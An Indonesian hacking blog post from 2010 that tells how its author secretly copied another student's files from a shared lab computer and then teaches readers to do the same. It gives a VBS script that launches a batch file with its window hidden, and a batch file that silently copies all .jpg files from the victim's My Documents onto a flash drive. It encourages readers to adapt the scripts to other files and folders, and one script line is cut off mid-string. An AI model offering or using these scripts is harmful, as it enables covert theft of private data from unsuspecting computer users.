Welcome To Hacked Akuntan By : Abdoel

Selama Kaki Kita Masih Menginjak Bumi Tak Ada Yang Tak Mungkin Untuk Menggapai Cita - Cita

Laman

5.06.2010

Trick Mencuri Data Ke Flash disk Secara Diam - Diam

TwitThis
Lagi iseng iseng googling ternyata dapat ilmu yang lumayan mantap dan dapat dibuat sangat gampang juga sangat berguna,Cara ini sudah saya terapkan dan berhasil seratus persen untuk mencuri curi isi data orang tanpa di ketahui dengan syarat harus mengetahui targetnya saja..
contoh ketika ian sedang OL di lab computer ada seorang yang bermain juga lalu dia memasukan flash disknya ke computer(JADI IAN MAIN DI LAB SATU KOMPUTER 2 orang dengan 2 MONITOR)ngertikan ?? lalu tiba tiba autorun membuka flash disk yang bermain di samping saya dan di computer saya pun juga kebuka lalu

yang disamping diganti si A :”ehh lw kok bisa lihat isi FD punya gw ??

saya jawab saja : “kan nih computer kita berdua yang pakai “

Si A : Ohh gitu ya,,,Tapi jangan lihat lihat isi FD gw ya!!!

Ian : “ yaaa “

Dari percakapan tersebut ian jadi penasaran akan FD dia yang ada banyak folder dan salah satunya adalah komik yang ian sangat sukai lalu ian keluarkanlah file yang ian buat lalu ian klik file buatan tersebut dengan tujuan untuk mencopy paste isi yang ada di dalam komik tersebut secara diam diam dan akhirnya semua file telah saya dapatkan ternyata komiknya itu adalah komik bokep semua hahahahaha pantesan saya gak boleh buka buka foldernya,,dasar bejat !!
Jika sobat pensaran ingin membuatnya yuk abdoel ajarkan !!
Trik mencuri data ke Flash disk secara diam diam

1.Buka notepad, buat file vbs ketik atau copy paste script berikut:

dim wshshell, dos
set wshshell = wscript.createobject("wscript.shell")
dos = wshshell.expandenvironmentstrings("%coms...
wshshell.run (dos & " /c tarik.bat"), vbhide

2.Simpan dengan file name nya contoh start.vbs save as typenya pilih all files

3.Buka notepad lagi, buat file bat ketik atau copy paste script berikut:

@echo off
mkdir %computername%
xcopy "C:\Documents and Settings\%username%\My Documents\*.jpg" %computername% /s/c/q/r
@cls
@exit

4.Simpan dengan file name nya contoh tarik.bat save as typenya pilih all files.

5.Nama file bat ini harus sesuai dengan script file vbs baris ke empat (tarik.bat)

6.Simpan kedua file tersebut didalam flash disk, Untuk copy file komputer target secara diam-diam jalankan (2x klik) file start.vbs.

7.Selesai dech Trik mencuri data ke Flash disk secara diam diam

Simpan kedua file tersebut didalam flash disk, Untuk copy file komputer target secara diam-diam jalankan (2x klik) file start.vbs.
Fungsi file vbs (start.vbs) berfungsi untuk menjalankan file bat (tarik.bat) secara diam-diam atau istilahnya background proses. Sedangkan file bat (tarik.bat) berfungsi untuk menjalankan perintah copy semua file dengan ektensi tertentu yang ada dikomputer target.

Contoh tersebuat diatas adalah copy semua file yang berektensi jpg (file gambar) yang ada di folder MyDocuments di komputer target (lihat baris ketiga script file bat) Dan disimpan kedalam flash disk ke dalam folder dengan nama sesuai nama komputer target. anda bisa meng edit sendiri kedua file tsb diatas sesuai keperluan format file dan folder target yg akan di copy.
Jadi kesimpulannya kita dapat mencuri data diam diam karena kita tidak menggunakan copy paste yang seperti biasa namun menggunakan cmd jadi pada saat mencopy tidak aka ada yang tahu,kalau masalah kecepatan mencopynya sepertinya sama saja dengan yang copy paste normal.

0 komentar:

Posting Komentar

Yang Mw Comment Disini Aja

 

© Copyright by Welcome To Hacked Akuntan By abdoel...^_^.... Tips,Trick Informasi,Hacking dll. | Template by BloggerTemplates | Distributed by BloggerThemes